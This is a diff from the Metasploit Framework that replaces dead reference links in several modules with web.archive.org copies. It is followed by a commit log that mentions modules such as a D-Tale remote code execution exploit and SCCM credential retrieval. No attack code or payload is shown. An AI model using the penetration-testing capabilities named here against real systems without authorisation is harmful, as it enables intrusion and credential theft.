-          ['URL', 'https://lists.xymon.com/pipermail/xymon/2016-February/042986.html'],
+          ['URL', 'http://web.archive.org/web/20240519104648/https://lists.xymon.com/pipermail/xymon/2016-February/042986.html'],
          ['URL', 'https://xymon.sourceforge.net/'],
          ['URL', 'https://en.wikipedia.org/wiki/Xymon'],
          ['URL', 'https://en.wikipedia.org/wiki/Big_Brother_(software)']
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Auxiliary
          ['CVE', '2012-5192'],
          ['OSVDB', '86599'],
          ['EDB', '22216'],
-          ['URL', 'https://www.trustwave.com/spiderlabs/advisories/TWSL2012-016.txt']
+          ['URL', 'http://web.archive.org/web/20130827041908/https://www.trustwave.com/spiderlabs/advisories/TWSL2012-016.txt']
        ],
      'Author'         =>
        [
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary
      'References'     => [
        ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],
        ['URL', 'https://www.mandiant.com/resources/breaking-down-the-china-chopper-web-shell-part-ii'],
-        ['URL', 'https://www.exploit-db.com/docs/27654.pdf'],
+        ['URL', 'http://web.archive.org/web/20170214000632/https://www.exploit-db.com/docs/27654.pdf'],
        ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA15-314A'],
        ['URL', 'http://blog.csdn.net/nixawk/article/details/40430329']
      ],
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Auxiliary
        'Jon Hart <jon_hart[at]rapid7.com>' # improved metasploit module
      ],
      'References'  => [
-        ['URL', 'https://github.com/git/git/blob/master/Documentation/technical/index-format.txt']
+        ['URL', 'http://web.archive.org/web/20220609025426/https://github.com/git/git/blob/master/Documentation/technical/index-format.txt']
      ],
      'License'     => MSF_LICENSE
    )
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
          ['CVE', '2002-0422'],
          ['BID', '1499'],
          ['EDB', '20096'],
-          ['URL', 'https://support.microsoft.com/en-us/help/218180/internet-information-server-returns-ip-address-in-http-header-content'], # iis 4,5,5.1
+          ['URL', 'http://web.archive.org/web/20201125004436/https://support.microsoft.com/en-us/help/218180/internet-information-server-returns-ip-address-in-http-header-content'], # iis 4,5,5.1
          ['URL', 'https://support.microsoft.com/en-us/topic/fix-the-internal-ip-address-of-an-iis-7-0-server-is-revealed-if-an-http-request-that-does-not-have-a-host-header-or-has-a-null-host-header-is-sent-to-the-server-c493e9bc-dfd3-0d9b-941c-b2d93a957d9e'], # iis 7+
          ['URL', 'https://techcommunity.microsoft.com/t5/iis-support-blog/iis-web-servers-running-in-windows-azure-may-reveal-their/ba-p/826500']
        ]
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary
        'References'     =>
          [
            [ 'URL', 'https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/' ],
-            [ 'URL', 'https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability' ]
+            [ 'URL', 'http://web.archive.org/web/20150921104258/http://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability' ]
          ]
      )
    )
@@ -22,8 +22,8 @@ class MetasploitModule < Msf::Auxiliary
      'References'  =>
        [
          [ 'CVE', '2017-5689' ],
-          [ 'URL', 'https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability' ],
-          [ 'URL', 'https://www.intel.com/content/www/us/en/security-center/default.html?intelid=INTEL-SA-00075&languageid=en-fr' ],
+          [ 'URL', 'http://web.archive.org/web/20191225124314/https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability' ],
+          [ 'URL', 'http://web.archive.org/web/20250208090258/https://www.intel.com/content/www/us/en/security-center/default.html?intelid=INTEL-SA-00075' ],
        ],
      'DisclosureDate' => 'May 05 2017'
    )
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Auxiliary
      'References'     => [
        ['CVE' , '2017-1001000'],
        ['WPVDB', '8734'],
-        ['URL',   'https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html'],
+        ['URL',   'http://web.archive.org/web/20250221003135/https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html'],
        ['URL',   'https://www.php.net/manual/en/language.types.type-juggling.php'],
        ['URL',   'https://developer.wordpress.org/rest-api/using-the-rest-api/discovery/'],
        ['URL',   'https://developer.wordpress.org/rest-api/reference/posts/']
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary
    [
      [ 'CVE', '2015-0235' ],
      [ 'URL', 'https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235/'],
-      [ 'URL', 'https://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html']
+      [ 'URL', 'http://web.archive.org/web/20250117140537/https://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html']
    ]
    ))

@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
      'References'  =>
        [
          ['URL', 'https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/' ],
-          ['URL', 'https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html' ]
+          ['URL', 'http://web.archive.org/web/20250220003829/https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html' ]
        ],
      'DefaultOptions' =>
        {
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary
      'References'     =>
        [
          ['WPVDB', '7754'],
-          ['URL', 'http://wordpressa.quantika14.com/repository/index.php?id=24']
+          ['URL', 'http://web.archive.org/web/20191021124407/http://wordpressa.quantika14.com/repository/index.php?id=24']
        ],
      'Author'         =>
        [
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Auxiliary
        'Author'         => ['Jon Hart <jon_hart[at]rapid7.com>', 'Mumbai'],
        'References'     =>
          [
-            ['URL', 'https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html'],
+            ['URL', 'http://web.archive.org/web/20221003014218/http://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html'],
            ['URL', 'https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature'],
            ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170214-smi'],
            ['URL', 'https://github.com/Cisco-Talos/smi_check'],
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary
        ],
        'References'    => [
          ['URL', 'http://antirez.com/news/96'],
-          ['URL', 'http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/'],
+          ['URL', 'http://web.archive.org/web/20240907110448/https://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/'],
          ['URL', 'https://redis.io/topics/protocol']
        ],
        'Privileged'    => true,
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary
      },
      'References'  =>
        [
-          [ 'URL', 'https://www.rapid7.com/blog/post/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string/' ]
+          [ 'URL', 'http://web.archive.org/web/20220819052410/https://www.rapid7.com/blog/post/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string/' ]
        ],
      'Author'      => ['Deral "PercentX" Heiland'],
      'License'     => MSF_LICENSE
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
jheysel-r7	c3ffdb12f5	Merge pull request #19946 from zeroSteiner/feat/mod/relay/ms08-068-warning Add a warning for MS08-068 when applicable	2025-03-05 11:11:20 -08:00
jenkins-metasploit	ef638ae104	automatic module_metadata_base.json update	2025-03-05 19:05:21 +00:00
jheysel-r7	37e92f76f3	Merge pull request #19639 from zeroSteiner/feat/mod/relay/checks Support checks in relay modules	2025-03-05 10:58:34 -08:00
Spencer McIntyre	f6c8b98bd6	Finish up the ESC8 check after more research	2025-03-05 13:44:33 -05:00
Spencer McIntyre	04842eaaee	Add a check method to the smb_relay module	2025-03-05 13:44:33 -05:00
Spencer McIntyre	4422cb53eb	Update target_host information	2025-03-05 13:44:33 -05:00
Spencer McIntyre	4004c1f215	Add #signing_required to SMB::SimpleClient	2025-03-05 13:44:33 -05:00
Spencer McIntyre	0116d0c04b	Actually count the hosts RangeWalker handles many more formats for specifying multiple hosts, so simply checking for a space is insufficient.	2025-03-05 13:44:33 -05:00
Spencer McIntyre	b43dc8be08	Switch relay modules, add ESC8 check method	2025-03-05 13:44:33 -05:00
Spencer McIntyre	5e3953e53e	Add a new mixin for handling multiple targets	2025-03-05 13:44:33 -05:00
Spencer McIntyre	7950d866f3	Use the existing #validate method for options	2025-03-05 13:44:33 -05:00
Spencer McIntyre	dbce82416c	Add a warning for MS08-068 when applicable	2025-03-05 13:31:26 -05:00
adfoster-r7	95e8b31d4b	Merge pull request #19925 from zeroSteiner/fix/auxiliary/validate Call #validate in run_simple like it is in call_simple	2025-03-05 18:29:01 +00:00
Diego Ledda	03b90701cd	Land #19927 , get_sysinfo add support for several Linux distros Land #19927, get_sysinfo add support for several Linux distros	2025-03-05 18:35:24 +01:00
jenkins-metasploit	03277a486f	automatic module_metadata_base.json update	2025-03-05 17:34:06 +00:00
Diego Ledda	c698979dd3	Land #19935 , SonicWall NSv HTTP Login Module Land #19935, SonicWall NSv HTTP Login Module	2025-03-05 18:27:34 +01:00
jenkins-metasploit	c62f04109b	automatic module_metadata_base.json update	2025-03-05 17:03:34 +00:00
adfoster-r7	8604c72ef4	Merge pull request #19895 from cgranleese-r7/update-dead-module-references Update dead module references	2025-03-05 16:57:05 +00:00
adfoster-r7	8102bed3b7	Merge pull request #19896 from cgranleese-r7/adds-scripts-for-dead-module-references Adds scripts to handle dead module reference links	2025-03-05 16:54:00 +00:00
Martin Sutovsky	1bea1baba0	Addressing comments in PR	2025-03-05 14:02:31 +01:00
msutovsky-r7	7a1892e6e7	Land #19745 , applying argument escaping to other shells Apply escaping args to other command shells	2025-03-05 09:24:15 +01:00
Ashley Donaldson	fa4dd1d420	Add error handling on unknown shell type	2025-03-05 18:16:31 +11:00
Spencer McIntyre	2422f8b67b	Add specs to test the #validate method	2025-03-04 17:49:15 -05:00
Spencer McIntyre	f2bcf34d51	Apply the same refactoring to exploits	2025-03-04 17:01:46 -05:00
Spencer McIntyre	f12ddc7252	Apply the same refactoring to posts	2025-03-04 17:01:46 -05:00
Spencer McIntyre	f2e29a326e	Remove dead code that shouldn't get hit anymore	2025-03-04 13:05:56 -05:00
Spencer McIntyre	112b8f5ece	Call #validate before walking the rhosts	2025-03-04 13:05:56 -05:00
Spencer McIntyre	8d3d8d8662	Call #validate in run_simple like it is in call_simple	2025-03-04 13:05:56 -05:00
Spencer McIntyre	d626886250	Merge pull request #19940 from adfoster-r7/update-ubuntu-versions-for-github-actions Update ubuntu versions for Github actions	2025-03-04 13:03:59 -05:00
adfoster-r7	91f1db308d	Update ubuntu versions for github actions	2025-03-04 17:52:31 +00:00
Diego Ledda	54465f30f2	Land #19917 , Add NIST SP 800 Crypto Primitives Land #19917, Add NIST SP 800 Crypto Primitives	2025-03-04 17:50:01 +01:00
Martin Sutovsky	8d7bbdd84f	Sonicwall module	2025-03-04 08:20:22 +01:00
jenkins-metasploit	59b862ce35	automatic module_metadata_base.json update	2025-03-03 21:57:03 +00:00
jheysel-r7	b1d0eedc26	Merge pull request #19712 from smashery/naa_creds NAA creds from SCCM	2025-03-03 13:50:31 -08:00
adfoster-r7	b0fec4ebd7	Merge pull request #19933 from zeroSteiner/feat/enable-ldap-sessions Enable LDAP sessions by default	2025-03-03 20:20:11 +00:00
Jack Heysel	4d57710d92	Make timeout configurable and nil check content	2025-03-03 11:47:10 -08:00
Spencer McIntyre	b94418a863	Enable LDAP sessions by default	2025-03-03 14:37:49 -05:00
adfoster-r7	eef2e4c26c	Merge pull request #19918 from msutovsky-r7/feat/separate_class_http_digest_auth Moving HTTP Digest Authentication response moved into separa…	2025-03-03 19:26:38 +00:00
adfoster-r7	60e9cae636	Merge pull request #19926 from jheysel-r7/gem_bump_for_get_naa_module Gem bump for new get_naa_credentials module	2025-03-03 18:40:35 +00:00
adfoster-r7	b1b8ad376e	Merge pull request #19922 from cgranleese-r7/fixes-crash-when-searching-modules-by-target Fixes crash when searching by target	2025-03-03 16:03:59 +00:00
jenkins-metasploit	c9421a65cc	automatic module_metadata_base.json update	2025-03-03 12:12:04 +00:00
msutovsky-r7	3c4d0aae2f	Land #19899 , D-Tale remote code execution module Add D-Tale RCE module (CVE-2024-3408, CVE-2025-0655)	2025-03-03 13:04:45 +01:00
Takah1ro	47351e4959	Use FETCH_DELETE as default	2025-03-03 20:52:55 +09:00
Martin Sutovsky	94fcda9eb6	Removing unnecessary function	2025-03-03 08:18:54 +01:00
Takah1ro	65d2b6380b	Update vulnerable version	2025-03-02 12:14:25 +09:00
bcoles	5cc5563625	Msf::Post:Linux::System.get_sysinfo: Add support for several Linux distros	2025-03-01 17:09:31 +11:00
Takah1ro	77c3ce52e0	Improve: * Support the prior to 3.13.0 versions * CVE-2024-3408 bypass for authentication	2025-03-01 11:58:28 +09:00
Takah1ro	316ecd4d04	Use FETCH_FILELESS as default	2025-03-01 11:55:43 +09:00
Jack Heysel	ee89d10886	Gem bump for get_naa_creds module	2025-02-28 18:12:56 -08:00
cgranleese-r7	7a5ff2a360	Adds tests for nil scenarios	2025-02-28 15:01:28 +00:00
cgranleese-r7	57e3045b57	Fixes crash when searching modules by target	2025-02-28 13:51:22 +00:00
jenkins-metasploit	8ac44d55cd	automatic module_metadata_base.json update	2025-02-28 12:59:37 +00:00
Spencer McIntyre	b4ca537785	Merge pull request #19920 from jheysel-r7/docs/vuln_cert_finder_update Add docs for ESC4,13 and 15 vulnerable template configuration	2025-02-28 07:49:27 -05:00
Spencer McIntyre	b3602b2ade	Merge pull request #19919 from jheysel-r7/fix/nil_check/esc_cert_finder Ldap vulnerable cert finder minor fix for ESC13 detection	2025-02-28 07:46:06 -05:00
cgranleese-r7	df8b0de0c8	Fixes some invalid links	2025-02-28 11:29:59 +00:00
cgranleese-r7	0017fbdf56	Updates more dead links	2025-02-28 10:30:14 +00:00
cgranleese-r7	acd692e139	Adds two scripts to handle dead module reference links	2025-02-28 09:52:42 +00:00
cgranleese-r7	810e7c4518	Adds scripts to find and replace dead module reference links	2025-02-28 09:20:48 +00:00
Jack Heysel	d2dd9a6d8f	Add docs for ESC4,13 and 15 vulnerable template configuration	2025-02-27 22:54:24 -08:00
Jack Heysel	62b8ded001	Vuln cert finder minor fix plus doc update	2025-02-27 22:42:27 -08:00
Martin Sutovsky	149c442d70	Moving HTTP Digest Authentication response counting moved into separate class, rubocop-ing	2025-02-28 07:34:33 +01:00
msutovsky-r7	36b13f5be7	Land #19862 , updating Linux post library - additional comments, specs and new package module Linux post libs comments and specs	2025-02-28 06:54:44 +01:00
Spencer McIntyre	2fd05115c8	Add some basic NIST SP 800 108 specs	2025-02-27 13:33:59 -05:00
Spencer McIntyre	11818c2812	Switch to using Rex's Crypto module	2025-02-27 10:52:09 -05:00
h00die	b8429cb3e8	Update lib/msf/core/post/linux/packages.rb Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>	2025-02-27 09:25:46 -05:00
Spencer McIntyre	e159ea5300	Add the NIST SP 800 108 key derivation function	2025-02-26 18:09:36 -05:00
Spencer McIntyre	c9afd440f8	Add the NIST SP 800 38f key wrap function	2025-02-26 18:09:23 -05:00
h00die	29cb4416ed	remove solaris check since its in freebsd code branch	2025-02-26 18:52:50 +00:00
h00die	d9c2ed82fd	merge freebsd and solaris for packages lib	2025-02-26 18:21:10 +00:00
Takah1ro	40726d1859	Remove unnecessary & guard operator	2025-02-26 21:13:55 +09:00
Takah1ro	4d4b88c94e	Add D-Tale unauth RCE module (CVE-2025-0655)	2025-02-23 09:33:42 +09:00
h00die	df8ad37dde	Remove comment	2025-02-20 12:43:52 +00:00
h00die	e689d85c92	additional specs for packages	2025-02-19 16:40:07 -05:00
h00die	da06e5ad90	additional specs for packages	2025-02-19 16:23:16 -05:00
h00die	b328d3f318	better specs for packages lib	2025-02-19 15:15:18 -05:00
h00die	1bb9fc94ec	compile spec fixes	2025-02-18 16:43:19 -05:00
h00die	4bb8c30180	post linux spec fixes	2025-02-12 15:34:13 -05:00
h00die	66f49c25bd	post linux spec fixes	2025-02-12 15:15:09 -05:00
Ashley Donaldson	e024c115f3	Don't do any escaping on platforms with unknown escaping	2025-01-10 11:20:28 +11:00
h00die	2e3661a07b	rubocop specs	2024-12-21 13:20:27 -05:00
h00die	262e4b8c13	ignore sleeps	2024-12-21 13:19:15 -05:00
Ashley Donaldson	851beb77b0	Change from code review Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>	2024-12-20 08:48:38 +11:00
Ashley Donaldson	25cb21908a	Apply escaping args to other command shells	2024-12-18 10:44:38 +11:00
Ashley Donaldson	c6e3df85bb	Report creds to DB	2024-12-17 17:01:27 +11:00
Ashley Donaldson	7badd24b72	Removed unused sccm file	2024-12-17 17:01:27 +11:00
Ashley Donaldson	4c7d1d8079	Changes from code review	2024-12-17 17:01:27 +11:00
Ashley Donaldson	ad44afee01	Rubocop fixes	2024-12-17 17:01:27 +11:00
Ashley Donaldson	a11616d189	Add support for older encryptions	2024-12-17 17:01:27 +11:00
Ashley Donaldson	556e52d1d2	Add missing option docs	2024-12-17 17:01:27 +11:00
Ashley Donaldson	335825a020	Search for all policies with secrets, rather than just NAAConfig	2024-12-17 17:01:27 +11:00
Ashley Donaldson	c2495aff58	Properly support there being no NAA creds	2024-12-17 17:01:27 +11:00
Ashley Donaldson	0a45480c49	Properly support multiple NAA creds	2024-12-17 17:01:27 +11:00
Ashley Donaldson	6054d7c5ce	Better error handling for NAA	2024-12-17 17:01:26 +11:00
Ashley Donaldson	d52874ac46	Allow sessions to be not required. Added documentation.	2024-12-17 17:01:26 +11:00
Ashley Donaldson	6ec6909850	MsfTidy fixes	2024-12-17 17:01:26 +11:00
Ashley Donaldson	a8a782eb2e	Get working without autodiscovery Added proper credits for the original research.	2024-12-17 17:01:26 +11:00
Ashley Donaldson	fd3f313c64	Report multiple NAA creds, if present	2024-12-17 17:01:26 +11:00
Ashley Donaldson	03a4acf7d0	Rubocop fixes	2024-12-17 17:01:26 +11:00
Ashley Donaldson	76c29831fa	Working NAA retrieval on recent SCCM	2024-12-17 17:01:26 +11:00
Ashley Donaldson	2d7985b511	Add crypto structures	2024-12-17 17:01:26 +11:00
Ashley Donaldson	5dd55f0af4	Add initial NAA-cred-snarfing code.	2024-12-17 17:01:26 +11:00
h00die	80d15ae86d	more specs and progress	2024-12-11 17:52:07 -05:00
h00die	9ccc0a3070	lib spec progress	2024-12-05 15:40:57 -05:00
h00die	cde660065c	more specs for linux post libraries	2024-12-01 20:00:58 -05:00
h00die	61705db8be	more specs for linux post libraries	2024-11-27 16:07:40 -05:00
h00die	b9c8c63501	lib post linux comments and specs	2024-11-26 19:00:14 -05:00